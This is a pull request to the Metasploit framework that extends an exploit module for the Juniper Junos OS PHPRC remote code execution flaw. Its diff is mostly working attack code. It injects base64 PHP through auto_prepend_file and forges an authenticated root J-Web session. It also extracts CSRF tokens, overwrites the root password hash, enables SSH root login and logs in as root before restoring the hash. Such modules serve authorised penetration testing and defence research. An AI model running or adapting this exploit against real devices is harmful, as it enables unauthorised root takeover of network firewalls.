### PR TITLE
Junos OS PHPRC: Added features for interactive ssh jailbreak

### DIFF
--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -36,11 +36,11 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 `allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
 `data://` to provide a file inline which includes the base64 encoded PHP payload.
 
-By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
-datastore option `JAIL_BREAK`, that when set to true, will steal the necessary tokens from a user authenticated
-to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
-to the J-Web application this method will not work. The module then authenticates with the new root password over
-SSH and then rewrites the original root password hash to /etc/master.passwd.
+By default this exploit returns a session confined to a FreeBSD jail with limited functionality when using the
+`PHP In-Memory target`. When using the `Interactive SSH with jail break` target the module will steal the necessary
+tokens from a user authenticated to the J-Web application, in order to overwrite the root password hash. If there is no
+user authenticated to the J-Web application the module will create one. The module then authenticates with the new root
+password over SSH and then rewrites the original root password hash to /etc/master.passwd.
 
 ### Setup
 
@@ -144,7 +144,7 @@ Meterpreter : php/freebsd
 meterpreter > exit
 ```
 
-### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova
 ```
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > show targets
 

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -74,7 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :nix_stream,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/unix/interact',
-                'WfsDelay' => 30
+                'WfsDelay' => 30,
+                'HttpClientTimeout' => 60 # setting the timeout to 60 seconds for old devices
               },
               'Payload' => {
                 'Compat' => {
@@ -125,16 +126,13 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = "allow_url_include=1\n"
     post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""
     send_request_cgi(
-      {
-        'uri' => normalize_uri(target_uri.path),
-        'method' => 'POST',
-        'data' => post_data,
-        'ctype' => 'application/x-www-form-urlencoded',
-        'vars_get' => {
-          'PHPRC' => phprc
-        }
-      },
-      60 # setting the timeout to 60 seconds for old devices
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        'PHPRC' => phprc
+      }
     )
   end
 
@@ -281,20 +279,17 @@ $user->set_var('junos-version',$imageName);
   def set_root_password(php_session_id, csrf_token, password_hash)
     post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
     res = send_request_cgi(
-      {
-        'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
-        'method' => 'POST',
-        'data' => post_data,
-        'ctype' => 'application/x-www-form-urlencoded',
-        'headers' =>
-          {
-            'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
-          },
-        'vars_get' => {
-          'action' => 'commit'
-        }
-      },
-      60 # setting the timeout to 60 seconds for old devices
+      'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
+        },
+      'vars_get' => {
+        'action' => 'commit'
+      }
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
@@ -309,20 +304,17 @@ $user->set_var('junos-version',$imageName);
   def set_ssh_root_login(php_session_id, csrf_token)
     post_data = "&current-path=/system/services/ssh/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-root-login=allow"
     res = send_request_cgi(
-      {
-        'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'services', 'ssh'),
-        'method' => 'POST',
-        'data' => post_data,
-        'ctype' => 'application/x-www-form-urlencoded',
-        'headers' =>
-          {
-            'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
-          },
-        'vars_get' => {
-          'action' => 'commit'
-        }
-      },
-      60 # setting the timeout to 60 seconds for old devices
+      'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'services', 'ssh'),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
+        },
+      'vars_get' => {
+        'action' => 'commit'
+      }
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
           By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
           datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated
-          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated 
-          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work. 
-          The module then authenticates with the new root password over SSH and then rewrites the original root password 
+          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
+          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work.
+          The module then authenticates with the new root password over SSH and then rewrites the original root password
           hash to /etc/master.passwd. There is an option to set allow ssh root login, if disabled.
         },
         'Author' => [
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    
+
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
 
     if php_session_id.nil?
@@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     php_session_id
   end
 
-  def create_php_session()
+  def create_php_session
     create_sess = "<?php
 require('main.inc.php');
 global $loginPage;
@@ -197,7 +197,7 @@ $output = $user->xnm->query('request-web-management-login',
     ), true);
 $output = $user->transform->strip_ns($output);
 $user->session->set_authenticated(2919675462);
-  
+
 $imageName = $c['version']['release'];
 $user->set_var('junos-version',$imageName);
 ?>"
@@ -208,9 +208,9 @@ $user->set_var('junos-version',$imageName);
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    
+
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
-    fail_with(Failure::UnexpectedReply, "Failed to create a user session.") unless php_session_id
+    fail_with(Failure::UnexpectedReply, 'Failed to create a user session.') unless php_session_id
     print_status("Session created: #{php_session_id}.")
     php_session_id
   end
@@ -222,10 +222,10 @@ $user->set_var('junos-version',$imageName);
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    
+
     print_status("Print Session Cookie: #{res.body.lines.first}.")
     csrf_token = res.body.scan(/csrf_token\|s:\d+:"([^"]+)";/).flatten[0]
-    
+
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
     print_status("Found csrf token: #{csrf_token}.")
     csrf_token
@@ -323,7 +323,7 @@ $user->set_var('junos-version',$imageName);
     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
     end
-    print_status("Successfully set ssh root login to allow")
+    print_status('Successfully set ssh root login to allow')
   end
 
   def ssh_login

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -216,16 +216,22 @@ $user->set_var('junos-version',$imageName);
   end
 
   def get_csrf_token(php_session_id)
-    get_var_sess = "<?php echo file_get_contents('#{datastore['SESSION_DIRECTORY']}/sess_#{php_session_id}'); ?>"
-
-    res = send_php_exploit('/dev/fd/0', get_var_sess)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diagnose'),
+      'method' => 'GET',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
+        },
+      'vars_get' => {
+        'm[]' => 'pinghost'
+      }
+    )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
-    print_status("Print Session Cookie: #{res.body.lines.first}.")
-    csrf_token = res.body.scan(/csrf_token\|s:\d+:"([^"]+)";/).flatten[0]
-
+    csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
     print_status("Found csrf token: #{csrf_token}.")
     csrf_token

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -194,7 +194,7 @@ $output = $user->xnm->query('request-web-management-login',
     array(
   'user' => 'root',
   'session-id' => session_id(),
-  'from' => '192.168.0.1',
+  'from' => '#{Faker::Internet.ip_v4_address}',
   'cache' => CONFIG_CACHE_DISABLE,
   'template-user' => $template_username
     ), true);

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -185,7 +185,6 @@ $user->set_var(DEBUG_ASP, 'sp-0/0/0');
 $user->set_var(DEBUG_WIZARD_COMMIT, true);
 
 // Set up XNM username and logged user name
-//$user->xnm = new junoscript($this->get_var(TEMPLATE_USERNAME), $this->get_var(USERNAME));
 $user->xnm->set_user_name('root');
 $user->xnm->set_logged_user_name('root');
 

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -32,14 +32,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
           By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
           datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated
-          to the J-Web application, in order to overwrite the root password hash. If there is no user
-          authenticated to the J-Web application this method will not work. The module then authenticates
-          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.
+          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated 
+          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work. 
+          The module then authenticates with the new root password over SSH and then rewrites the original root password 
+          hash to /etc/master.passwd. There is an option to set allow ssh root login, if disabled.
         },
         'Author' => [
           'Jacob Baines',  # Analysis
           'Ron Bowes',     # Jail break technique + Target setup instructions
-          'jheysel-r7'     # Msf module
+          'jheysel-r7',    # Msf module
+          'Fabian Hafner'  # session creation, old version switch, allow ssh root login, working timeouts
         ],
         'References' => [
           [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],
@@ -96,8 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive SSH with jail break", the root user\'s password will be temporarily changed to this password', rand_text_alphanumeric(24)]),
+      OptString.new('SESSION_DIRECTORY', [ true, 'For old Junos versions the session files are stored in /tmp', '/var/sess']),
+      OptBool.new('OLD_HASH_FORMAT', [ true, 'For old Junos versions the password hash format is md5', false]),
+      OptBool.new('SET_ALLOW_ROOT_LOGIN', [ true, 'Try to set ssh root login to allow before estabilishing ssh session', false]),
       OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
       OptInt.new('SSH_TIMEOUT', [ true, 'The maximum acceptable amount of time to negotiate a SSH session', 30])
+
     ])
   end
 
@@ -119,47 +125,110 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = "allow_url_include=1\n"
     post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path),
-      'method' => 'POST',
-      'data' => post_data,
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_get' => {
-        'PHPRC' => phprc
-      }
+      {
+        'uri' => normalize_uri(target_uri.path),
+        'method' => 'POST',
+        'data' => post_data,
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_get' => {
+          'PHPRC' => phprc
+        }
+      },
+      60 # setting the timeout to 60 seconds for old devices
     )
   end
 
   def get_php_session_id
-    get_var_sess = "<?php print_r(scandir('/var/sess'));?>"
+    get_var_sess = "<?php print_r(scandir('#{datastore['SESSION_DIRECTORY']}'));?>"
     res = send_php_exploit('/dev/fd/0', get_var_sess)
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-
+    
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
 
-    fail_with(Failure::UnexpectedReply, "Failed to retrieve a PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
-    print_status("Found PHPSESSID: #{php_session_id}.")
+    if php_session_id.nil?
+      print_status("No PHPSESSID found in #{datastore['SESSION_DIRECTORY']}. Trying to create a session.")
+      php_session_id = create_php_session
+    end
+    print_status("PHPSESSID: #{php_session_id}.")
+    php_session_id
+  end
+
+  def create_php_session()
+    create_sess = "<?php
+require('main.inc.php');
+global $loginPage;
+global $enterlsysname;
+$loginPage = true;
+$enterlsysname = null;
+$user = new user(false);
+
+require_once('languages/' . $c['language'] . '/language.php');
+
+// Create session
+session_save_path('#{datastore['SESSION_DIRECTORY']}');
+session_start();
+$user->session->session_open = true;
+$user->set_language($c['language']);
+
+// Snag the hostname & model from the environment
+$user->set_var('device-hostname', $_SERVER['SERVER_NAME']);
+$user->set_var('device-model', $_SERVER['JNX_PRODUCT_MODEL']);
+$user->set_var(TEMPLATE_USERNAME, 'root');
+$user->set_var(USERNAME, 'root');
+$user->set_var(LSYSNAME, '');
+$user->set_var ('csrf_token', 'asdf');
+
+// Set up default variables for user
+$user->set_var(DEBUG_ASP, 'sp-0/0/0');
+$user->set_var(DEBUG_WIZARD_COMMIT, true);
+
+// Set up XNM username and logged user name
+//$user->xnm = new junoscript($this->get_var(TEMPLATE_USERNAME), $this->get_var(USERNAME));
+$user->xnm->set_user_name('root');
+$user->xnm->set_logged_user_name('root');
+
+// Call J-Web authentication RPC so MGD knows about this session
+$output = $user->xnm->query('request-web-management-login',
+    array(
+  'user' => 'root',
+  'session-id' => session_id(),
+  'from' => '192.168.0.1',
+  'cache' => CONFIG_CACHE_DISABLE,
+  'template-user' => $template_username
+    ), true);
+$output = $user->transform->strip_ns($output);
+$user->session->set_authenticated(2919675462);
+  
+$imageName = $c['version']['release'];
+$user->set_var('junos-version',$imageName);
+?>"
+    send_php_exploit('/dev/fd/0', create_sess)
+
+    get_var_sess = "<?php print_r(scandir('#{datastore['SESSION_DIRECTORY']}'));?>"
+    res = send_php_exploit('/dev/fd/0', get_var_sess)
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+    
+    php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
+    fail_with(Failure::UnexpectedReply, "Failed to create a user session.") unless php_session_id
+    print_status("Session created: #{php_session_id}.")
     php_session_id
   end
 
   def get_csrf_token(php_session_id)
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'diagnose'),
-      'method' => 'GET',
-      'headers' =>
-        {
-          'Cookie' => "PHPSESSID=#{php_session_id}"
-        },
-      'vars_get' => {
-        'm[]' => 'pinghost'
-      }
-    )
+    get_var_sess = "<?php echo file_get_contents('#{datastore['SESSION_DIRECTORY']}/sess_#{php_session_id}'); ?>"
+
+    res = send_php_exploit('/dev/fd/0', get_var_sess)
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-
-    csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text
+    
+    print_status("Print Session Cookie: #{res.body.lines.first}.")
+    csrf_token = res.body.scan(/csrf_token\|s:\d+:"([^"]+)";/).flatten[0]
+    
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
     print_status("Found csrf token: #{csrf_token}.")
     csrf_token
@@ -175,7 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' =>
         {
-          'Cookie' => "PHPSESSID=#{php_session_id}"
+          'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
         }
     )
 
@@ -213,17 +282,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def set_root_password(php_session_id, csrf_token, password_hash)
     post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
-      'method' => 'POST',
-      'data' => post_data,
-      'ctype' => 'application/x-www-form-urlencoded',
-      'headers' =>
-        {
-          'Cookie' => "PHPSESSID=#{php_session_id}"
-        },
-      'vars_get' => {
-        'action' => 'commit'
-      }
+      {
+        'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
+        'method' => 'POST',
+        'data' => post_data,
+        'ctype' => 'application/x-www-form-urlencoded',
+        'headers' =>
+          {
+            'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
+          },
+        'vars_get' => {
+          'action' => 'commit'
+        }
+      },
+      60 # setting the timeout to 60 seconds for old devices
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
@@ -233,6 +305,34 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
     end
     print_status("Successfully changed the root user's password ")
+  end
+
+  def set_ssh_root_login(php_session_id, csrf_token)
+    post_data = "&current-path=/system/services/ssh/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-root-login=allow"
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'services', 'ssh'),
+        'method' => 'POST',
+        'data' => post_data,
+        'ctype' => 'application/x-www-form-urlencoded',
+        'headers' =>
+          {
+            'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
+          },
+        'vars_get' => {
+          'action' => 'commit'
+        }
+      },
+      60 # setting the timeout to 60 seconds for old devices
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
+    end
+    print_status("Successfully set ssh root login to allow")
   end
 
   def ssh_login
@@ -260,19 +360,30 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :nix_stream
       print_status("Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.")
-      print_warning("This requires a user is authenticated to the J-Web application in order to steal a session token, also 'ssh root-login' is set to 'allow' on the device")
+      print_warning("This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.")
       php_session_id = get_php_session_id
       csrf_token = get_csrf_token(php_session_id)
       @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)
-      tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
+      if datastore['OLD_HASH_FORMAT']
+        tmp_password_hash = UnixCrypt::MD5.build(datastore['TMP_ROOT_PASSWORD'])
+      else
+        tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
+      end
+
       print_status "Temporary root password Hash: #{tmp_password_hash}"
+      print_status "Setting root password to #{datastore['TMP_ROOT_PASSWORD']} - this can take some time!"
       set_root_password(php_session_id, csrf_token, tmp_password_hash)
+
+      if datastore['SET_ALLOW_ROOT_LOGIN']
+        set_ssh_root_login(php_session_id, csrf_token)
+      end
 
       if (ssh = ssh_login)
         print_good('Logged in as root')
         handler(ssh.lsock)
       end
 
+      print_status "Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'."
       set_root_password(php_session_id, csrf_token, @og_encrypted_root_pass)
 
     when :php_memory

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -176,7 +176,7 @@ $user->set_var('device-model', $_SERVER['JNX_PRODUCT_MODEL']);
 $user->set_var(TEMPLATE_USERNAME, 'root');
 $user->set_var(USERNAME, 'root');
 $user->set_var(LSYSNAME, '');
-$user->set_var ('csrf_token', 'asdf');
+$user->set_var ('csrf_token', '#{Faker::Alphanumeric.alphanumeric}');
 
 // Set up default variables for user
 $user->set_var(DEBUG_ASP, 'sp-0/0/0');


### PR DESCRIPTION
This pull request adds several features:

1. Provides options to change the session directory and hash format, accommodating differences in older Junos OS versions.
2. Adds a method to create a valid user session if one is missing (a session is needed for the exploit) by using a minimalistic custom `login.php` to create this session on the device.
3. Adds an option to change the settings to allow root SSH login. This is necessary for the interactive jailbreak SSH connection.
4. Modifies the method for reading CSRF tokens to use the same method the exploit verifies, ensuring consistency and enabling the printing of the contents of the used cookie file.
5. Always sends `SECUREPHPSESSID` additionally that is used if SSL is enabled.

![junos_exploit](https://github.com/rapid7/metasploit-framework/assets/20166884/b71a22a1-30d6-4ce2-99f6-9acdcd308d3b)
